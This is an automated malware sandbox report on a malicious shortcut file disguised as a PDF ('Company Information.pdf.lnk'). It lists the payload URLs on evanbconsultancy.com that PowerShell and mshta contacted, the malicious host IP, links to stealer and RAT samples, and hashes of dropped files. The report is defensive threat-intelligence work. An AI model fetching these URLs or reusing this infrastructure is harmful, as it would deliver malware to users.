                                                                                                                                        https://evanbconsultancy.com/Light/OGCpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://evanbconsultancy.com/Fpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://evanbconsultancy.com/Ligpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://evanbconsultancy.com/Light/Opowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://evanbconsultancy.com/Fuel/Company%20Inforpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://evanbconsultancy.com/Fuel/Company%powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://evanbconsultancy.com/Sand/BuddyHmshta.exe, 0000000B.00000002.1545476268.000001FAB7960000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://evanbconsultancy.com/Lipowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://evanbconsultancy.com/Light/OGCMTYTR.powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.adobe.coReaderMessages.17.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://g.live.com/odclientsettings/Prod1C:edb.log.14.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://evanbconsultancy.cpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://evanbconsultancy.com/Light/OGCMpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://evanbconsultancy.com/Light/OGCMTYTpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://evanbconsultancy.com/Fuel/Company%20Informationpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://evanbconsultancy.com/Light/OGpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://evanbconsultancy.com/feed/powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://evanbconsultancy.com/wp-json/powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBACE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://evanbconsultancy.com/Fuel/Company%20Informatiopowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://crl.microsoftbpowershell.exe, 0000000F.00000002.1515747127.000001BBD2A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://evanbconsultancy.com/Fuel/powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://evanbconsultancy.com/Sand/BuddyXmshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://evanbconsultancy.com/Sand/BuddyVmshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://evanbconsultancy.com/.mshta.exe, 0000000B.00000002.1545175154.000001FAB78B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://evanbconsultancy.com/Fuel/Company%20Informapowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1305508383.0000025E58589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1305508383.0000025E5859C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBA831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://evanbconsultancy.com/Fuel/Company%20Ipowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://evanbconsultancy.com/Light/OGCMTYTRpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://evanbconsultancy.com/Fuel/Companypowershell.exe, 0000000F.00000002.1429491981.000001BBBC47A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://evanbconsultancy.com/comments/feed/powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://evanbconsultancy.com/Sand/BuddyinC:mshta.exe, 0000000B.00000003.1542410574.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545347428.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        84.32.84.121
                                                                                                                                                                                                        		evanbconsultancy.comLithuania
                                                                                                                                                                                                        		33922NTT-LT-ASLTtrue

                                                                                                                                                                                                        Private

                                                                                                                                                                                                        IP
                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1579316
                                                                                                                                                                                                        Start date and time:2024-12-21 15:01:11 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 6m 40s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:28
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:Company Information.pdf.lnk
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.evad.winLNK@28/62@3/2
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        • Number of executed functions: 12
                                                                                                                                                                                                        • Number of non-executed functions: 3
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .lnk

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 199.232.210.172, 162.159.61.3, 172.64.41.3, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 23.195.39.65, 2.19.126.143, 2.19.126.149, 2.20.40.170, 2.22.50.144, 2.22.50.131, 13.107.246.63, 172.202.163.200, 3.219.243.226, 20.12.23.50
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, time.windows.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                                                                                                                                                        • Execution Graph export aborted for target mshta.exe, PID 6912 because there are no executed function
                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1240 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        • VT rate limit hit for: Company Information.pdf.lnk

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        09:02:10API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                        09:02:16API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                        09:02:16API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                        09:02:19API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                        10:12:31API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        84.32.84.1214Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.kosherphonestore.com/ktbm/

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        bg.microsoft.map.fastly.netNavan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                        Statements.pdfGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        INVOICE_2279_from_RealEyes Digital LLC (1).pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                        Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                        MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 199.232.214.172

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        NTT-LT-ASLTER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.229
                                                                                                                                                                                                        truepepe-qt.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                        • 84.32.84.101
                                                                                                                                                                                                        z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32
                                                                                                                                                                                                        profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32
                                                                                                                                                                                                        ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32
                                                                                                                                                                                                        Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32
                                                                                                                                                                                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32
                                                                                                                                                                                                        ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32
                                                                                                                                                                                                        http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.239
                                                                                                                                                                                                        DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 84.32.84.32

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        2BI8rJKpBa.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        Oggq2dY6kx.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 84.32.84.121

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                        Entropy (8bit):0.7067208222846537
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq7:2JIB/wUKUKQncEmYRTwh0f
                                                                                                                                                                                                        MD5:0E3605C50F56F7DE25CC37D66AC2B585
                                                                                                                                                                                                        SHA1:649501AED999425F644DE45EB33B4C12CDB7800A
                                                                                                                                                                                                        SHA-256:081002163620504B50D2AEB959971EBC64C81EF0BB9155AD1FE777BD90E7B054
                                                                                                                                                                                                        SHA-512:366B5F8C51892A7D92A57B13E923E5836C06B075370797FD5416801D47E4BF1FC15D68B7FD4FB86935A2A6E1522128DB6C7E3A2C368EEA5BD77583E4B16B82E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3f1c3e14, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                        Entropy (8bit):0.7899894283855141
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii
                                                                                                                                                                                                        MD5:C5E9E661BFB71F2A250DC02E958E3929
                                                                                                                                                                                                        SHA1:8CA1F823E9F80DEA4D769F97BDE6B866DA3EA064
                                                                                                                                                                                                        SHA-256:FA37D6316011EC586855A936D0ACC388A05144F9104FBBAB9902935751B8F103
                                                                                                                                                                                                        SHA-512:5F6E1257939D15229D02F7356D145526A6FA8C73F9EBD67349E3BF324A955FD9DB9EC342713B4EDDCCDD295427E87348F71B90D30A78AD8EBBC06AEAAA6509A0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:?.>.... ...............X\...;...{......................0.`.....42...{5......|7.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................k.j......|7.................qQC......|7..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.0822027245186767
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:jltKYeCkpARXht/57Dek3JUp1gAllltollEqW3l/TjzzQ/t:TKzlARXrR3tAgAllImd8/
                                                                                                                                                                                                        MD5:1C0C544E56681D673814BC86071575B5
                                                                                                                                                                                                        SHA1:129D13748F5BF2B3FDDEAC55DC970C8B0490FDBC
                                                                                                                                                                                                        SHA-256:4DDD0AB52AD50AC31AF12C04B362FDC0CE510CBEB8BDF676CFCC04A9938CA302
                                                                                                                                                                                                        SHA-512:1280D1279F3FAEEB1186913C7AF09C5F83C72172AE273D89D14C719F77BA0F39DC4D9F6E1601BBFD16FAC55A4B17D618DA4E0F25C1E17FAE2D2DC92B7E553DF1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.w|......................................;...{.......|7.42...{5.........42...{5.42...{5...Y.42...{59................qQC......|7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):300
                                                                                                                                                                                                        Entropy (8bit):5.200902934653739
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:PYDL+q2PcNwi2nKuAl9OmbnIFUt8+TZmw++DVkwOcNwi2nKuAl9OmbjLJ:3vLZHAahFUt88/+854ZHAaSJ
                                                                                                                                                                                                        MD5:E1676E79A2D5BC2CC0A69C520ADE20CF
                                                                                                                                                                                                        SHA1:110E99D9533DA21B4CC16DFFB483E4237045AD26
                                                                                                                                                                                                        SHA-256:A7E3216F8D1D4EBBCCBF027631A751A8358E4B7A30E6D540A0F1E5EB7E43E4CC
                                                                                                                                                                                                        SHA-512:79B5D62740BC41EAB6DC6888BC306C292401C14F7EEA131A7E753913D53260542AF4EA074879B38BEB02185F4C311DA4217FC962DC305FC794DA106F397FCFA3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/12/21-09:02:26.420 1fd8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-09:02:26.423 1fd8 Recovering log #3.2024/12/21-09:02:26.423 1fd8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):300
                                                                                                                                                                                                        Entropy (8bit):5.200902934653739
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:PYDL+q2PcNwi2nKuAl9OmbnIFUt8+TZmw++DVkwOcNwi2nKuAl9OmbjLJ:3vLZHAahFUt88/+854ZHAaSJ
                                                                                                                                                                                                        MD5:E1676E79A2D5BC2CC0A69C520ADE20CF
                                                                                                                                                                                                        SHA1:110E99D9533DA21B4CC16DFFB483E4237045AD26
                                                                                                                                                                                                        SHA-256:A7E3216F8D1D4EBBCCBF027631A751A8358E4B7A30E6D540A0F1E5EB7E43E4CC
                                                                                                                                                                                                        SHA-512:79B5D62740BC41EAB6DC6888BC306C292401C14F7EEA131A7E753913D53260542AF4EA074879B38BEB02185F4C311DA4217FC962DC305FC794DA106F397FCFA3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/12/21-09:02:26.420 1fd8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-09:02:26.423 1fd8 Recovering log #3.2024/12/21-09:02:26.423 1fd8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):344
                                                                                                                                                                                                        Entropy (8bit):5.22375718750909
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:PCzuMM+q2PcNwi2nKuAl9Ombzo2jMGIFUt8+C8FZZmw++C8FMMVkwOcNwi2nKuAv:a5M+vLZHAa8uFUt8T8X/+T8qMV54ZHAv
                                                                                                                                                                                                        MD5:373EB0391C1EB5A74DC95DB976FCD8B1
                                                                                                                                                                                                        SHA1:A86B9CA13A89F98DFD47E58794759C46C72C3645
